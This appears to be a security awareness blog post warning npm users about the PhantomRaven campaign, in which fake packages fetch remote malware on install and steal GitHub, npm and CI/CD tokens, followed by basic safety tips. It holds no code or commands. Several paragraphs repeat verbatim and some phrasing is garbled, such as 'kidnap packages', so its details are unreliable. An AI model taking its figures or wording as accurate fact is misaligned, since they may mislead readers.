Greetings! If you utilize npm-related projects, you will want to learn about this. The npm world has seen a new attack called PhantomRaven; this attack’s purpose is to steal users’ authentication details, tokens, and secrets, and you should take it seriously. Does this sound serious? We will explain this in more details here.
So what’s the point? PhantomRaven kidnap packages impersonate normal npm packages and actually steal your authentication details once installed and your user logs in. These details include:
• GitHub and GitLab tokens
• npm auth tokens
• CI/CD user secrets (i.e. Jenkins and CircleCI).
The kidnap packages also exhibit zero reported dependency (to make them appear legitimate) and while executing the install would download hidden malware hosted elsewhere on the internet. This makes detecting any attack immensely challenging at first glance.
Smart, right? But also risky.
If a developer innocently installs one of these fake packages, the attacker can steal your secret API keys, own your project, or download malicious code to your code base!
And with npm being heavily used in thousands of projects across the internet, one bad package can easily spread consequences to hundreds of applications.
The next time you type npm install, ask yourself — "Am I positive this is clean?"
Stay vigilant, stay smart, and keep your code safe — one tiny check could save you from a big headache later on!
What exactly is PhantomRaven?
PhantomRaven is a large hacking campaign in which over 120 phishing npm packages have been uploaded to the registry. These kidnap packages to establish synthetic developers and have been downloaded more than 86,000 times!So what’s the point? PhantomRaven kidnap packages impersonate normal npm packages and actually steal your authentication details once installed and your user logs in. These details include:
• GitHub and GitLab tokens
• npm auth tokens
• CI/CD user secrets (i.e. Jenkins and CircleCI).
The kidnap packages also exhibit zero reported dependency (to make them appear legitimate) and while executing the install would download hidden malware hosted elsewhere on the internet. This makes detecting any attack immensely challenging at first glance.
Smart, right? But also risky.
Why This Is Serious
Have you ever put an npm package in your code without reading it closely? Yeah, we’ve all done it. But this attack shows us why that’s bad.If a developer innocently installs one of these fake packages, the attacker can steal your secret API keys, own your project, or download malicious code to your code base!
And with npm being heavily used in thousands of projects across the internet, one bad package can easily spread consequences to hundreds of applications.
How PhantomRaven Works
So here’s how they pulled it off (a simple breakdown):- They upload a fake npm package with no dependencies so it “looks” clean.
- When you install it, it simply downloads a file remotely.
- That hidden code collects information, such as tokens, emails, API keys, and whatever else it can find on your computer.
- The stolen tokens/information are then sent to the attackers over the internet.
How You Can Stay Safe
Here are some things you can do right now:- Review every npm package you're using — especially new or unfamiliar ones.
- Don't trust package names that look even slightly unexpected.
- Limit the secrets available to your systems and accounts.
- Use 2FA (two-factor authentication) for npm and GitHub.
- Only stick to trusted developers and verified packages.
Final Thoughts
The PhantomRaven attack is a reminder that "safe-looking" packages may be anything but. Always confirm that what you are about to install is safe.The next time you type npm install, ask yourself — "Am I positive this is clean?"
Stay vigilant, stay smart, and keep your code safe — one tiny check could save you from a big headache later on!